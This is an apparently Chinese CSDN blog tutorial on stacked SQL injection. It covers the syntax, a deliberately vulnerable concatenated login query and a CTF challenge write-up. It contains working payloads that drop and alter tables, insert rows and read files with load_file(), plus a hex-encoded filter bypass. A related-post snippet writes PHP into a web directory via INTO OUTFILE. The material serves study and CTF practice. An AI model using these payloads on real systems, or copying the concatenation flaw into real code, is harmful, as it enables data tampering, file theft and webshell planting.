【sql注入-堆叠注入】多语句执行、结合其他注入

最新推荐文章于 2024-02-23 02:56:35 发布
最新推荐文章于 2024-02-23 02:56:35 发布
阅读量4k 收藏 5
点赞数
分类专栏: 【黑色地带-实战中心】 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/131562199
版权

目录

堆叠注入

一、语法介绍

二、漏洞示例

三、常见形式

网络安全O

堆叠注入

一、语法介绍:

版本:

可以影响几乎所有的关系型数据库

原理:

将多条语句堆叠在一起进行查询,且可以执行多条SQL语句

语句之间以分号(;)隔开,其注入攻击就是利用此特点,在第二条语句中构造payload

优势:

联合查询union也可拼接语句(有局限性)

但是堆叠注入能注入任意语句

局限:

利用mysqli_multi_query()函数就支持多条sql语句同时执行

但实际情况中,PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行

mysqli_query()函数:

mysqli_query($connection, $query);

//$connection:表示与MySQL服务器的连接,可以通过mysqli_connect()函数进行创建。
//$query:表示要执行的SQL查询语句。

使用:

有注入点:即存在sql注入漏洞

未过滤:即未对";"号进行过滤

未禁用:即未禁止执行多条sql语句

第一步:使用堆叠查询构造多条语句

select * from users where id=1;create table test like users; 

第二步:查看语句是否成功执行

show tables;

第三步:删除test,再查询

select * from users where id=1;drop table test;

show tables;

(被成功执行了)

 

 第四步:执行其它查询语句

查数据库当前用户,版本

select * from user where id=1;select 1,user(),database();

其他操作:

加载文件

select * from user where id=1;select load_file('文件路径');

修改数据

select * from user where id=1;insert into user(username,password) values ('好好学习','123456');

二、漏洞示例

代码示例:

def login(username, password):
    query = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"
    # 执行查询并验证用户登录信息
    ...

login函数接收一个用户名和密码作为参数,并构建了一个SQL查询语句。然而,它没有对输入进行任何验证或转义,直接将用户提供的输入拼接到查询字符串中

如恶意代码:

';select sleep(10);--+

查询语句将变成:

SELECT * FROM users WHERE username='';select sleep(10);--+' AND password='...'

如果存在注入的代码被执行,那么会执行sleep(10)函数,延时10s

 三、常见形式

举例之:“强网杯2019随便注”

已知:words表能回显内容,`1919810931114514` 表不能回显具体内容,select被过滤了

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) ;show columns from words;#

1、堆叠注入

';    开始堆叠

RENAME TABLE wordsTOwords1;   将名为words的表重命名为words1

RENAME TABLE 1919810931114514TOwords;  将名为1919810931114514的表重命名为words

ALTER TABLE wordsCHANGEflag id VARCHAR(100);   更改words表中名为flag的列的名称为id,并将其数据类型更改为VARCHAR(100)(最大长度为100个字符)

SHOW COLUMNS FROM words;   显示words表的所有列以及其属性和信息

#    注释掉代码的剩余部分

2、堆叠注入+select编码绕过

;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

网络安全O

README.md · 书半生/网络安全知识体系-实战中心 - 码云 - 开源中国 (gitee.com)https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.md

GitHub - BLACKxZONE/Treasure_knowledgehttps://github.com/BLACKxZONE/Treasure_knowledge

黑色地带(崛起)
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sql注入语句sql注入语句sql注入语句
01-04
sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句sql注入语句...
MYSQL注入天书之stacked injection(堆叠注入
烟敛寒林的博客
10-24 1421
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...
SQL注入-堆叠注入
m0_53820621的博客
08-15 1363
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句堆叠注入后果很严重,可以直接对数据库增删改。...
sql注入堆叠注入
最新发布
m0_68976043的博客
02-23 1867
堆叠注入产生原因是因为mysql_multi_query()支持多行查询,如果没有这个函数我们使用不了堆叠注入,其次堆叠注入通过分号分隔。
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3131
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
SQL注入堆叠注入
07-15 907
SQL-堆叠注入
SQL注入- 堆叠注入
m0_52149675的博客
04-05 3036
​stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql 中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。
详解SQL注入--安全(二)
09-09
主要介绍了SQL注入安全,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
安全测试-常见sql注入方法,命令
03-31
安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
sql注入知识---堆叠注入
尘玥的故事
04-11 1122
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。根据数据库类型决定是否支持多条语句执行(核心)
sql-堆叠注入
zhhhb1005的博客
08-14 491
前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。
sql注入 - 堆叠注入
wcy19990628的博客
02-10 318
5、堆叠(多语句注入 http://localhost/sqli-labs-master/Less-38/?id=-1'; select "<?php phpinfo();?>" into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\aaaaaaaaqq.php" ;-- 在php连接mysql注入中用到了musqli_multi_query...
MySQL堆叠注入
qq_39654116的博客
01-05 429
目录堆叠注入简介对照表格语句 堆叠注入 简介 堆叠注入在mysql上不常见,必须要用到[[mysqli_multi_query()]],可以用分号分割来执行多个语句堆叠注入非常危险,通常sql注入有诸多限制,比如只能查不能增删改,不能更改数据库设置,而堆叠注入相当于获取了数据库密码进行直连,直接操作数据库 对照表格 PHP连接MySQL数据库有三种方式(MySQL、Mysqli、PDO),同时官方对三者也做了列表性比较: Mysqli PDO MySQL 引入的PHP版本 5.0 5.0
堆叠注入
weixin_30752377的博客
08-28 222
什么是堆叠注入? 顾名思义,堆叠注入就是将一堆sql语句叠加在一起执行,使用分号结束上一个语句再叠加其他语句一起执行。 题目 首先尝试闭合引号,并注释后面的内容。 发现没有报错,那就判断一下有多少列。 由此可以判断出有两列,接着判断回显位。 发现回显了过滤规则,select是被过滤的,还有一些注入常用语句也被过滤了。 这时就可以尝试一下堆叠注入。 发现这里爆出了所有数据库,再...
sqlmap堆叠注入
09-04
SQLMap是一款常用的自动化SQL注入工具,可以用于检测和利用Web应用程序中的SQL注入漏洞。堆叠注入是一种高级的SQL注入技术,它利用了多个SQL查询语句在同一次数据库连接中执行的特性。 堆叠注入的原理是将多个SQL查询语句通过分号(;)进行分隔,并在应用程序中通过相关的注入点将它们拼接在一起。这样,应用程序在执行SQL查询时会一次性执行所有的查询语句,从而可以执行更复杂的攻击操作。 要使用SQLMap进行堆叠注入,首先需要找到一个存在SQL注入漏洞的目标网站。通过使用SQLMap的命令参数和选项,可以指定注入点、数据库类型、注入技术等信息。然后,SQLMap会自动检测并利用漏洞,尝试获取敏感信息或执行攻击操作。 需要注意的是,使用SQLMap进行堆叠注入属于黑盒测试和授权范围内的安全研究活动,未经授权的测试可能违法并且对目标网站造成损害。在进行任何安全测试之前,请确保已获得合法的授权,并遵守相关法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值